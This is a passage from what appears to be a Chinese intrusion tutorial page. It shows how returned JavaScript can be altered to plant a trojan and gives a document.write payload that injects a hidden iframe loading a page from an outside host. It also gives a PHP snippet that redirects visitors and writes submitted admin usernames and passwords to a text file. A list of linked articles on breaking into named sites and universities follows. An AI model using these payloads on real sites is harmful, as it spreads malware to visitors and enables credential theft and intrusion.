|
大家看看返回了什么,直接就可以改页面了,如图6所示。
如果想挂马就更容易了,JS内容改为:
| 以下是引用片段: document.write("<iframe style='display:none;' src='http://xxx.com/xx.htm'%3E%3C/iframe%3E%22); |


| 以下是引用片段: <?php Header("Location: http://127.0.0.1:81/test/index.php?%22); if(isset($_POST['$admin_name'])&&isset($_POST['$admin_pass'])){ $file_path="password.txt"; $file = @fopen($file_path,"a"); $string = "Username:".$_POST['a_name']."and password:".$_POST['a_pass']."\n"; @fwrite($file,$string); @fclose($file); } ?> |

| 入侵88red系统的详细过程 | 04-07 |
| 对趋势科技等数万网站被攻击的分 | 03-21 |
| 凡人网络购物系统 V8.0 简体中文 | 03-18 |
| linux平台下渗透日本著名XXXXXX. | 03-18 |
| 搜索框所引起的XSS漏洞 | 03-05 |
| 跳转漏洞的利用 | 03-05 |
| 对复旦大学的一次漫长渗透 | 03-03 |
| .net一句话马以及dx论坛拿shell | 03-01 |
| php渗透入侵过程图文详解 | 03-01 |
| DJ网站的入侵详细过程 | 02-26 |
| BBSXP2008存在后台注射漏洞 | 02-19 |
| Discuz! 6 后台拿Shell的方法 | 02-17 |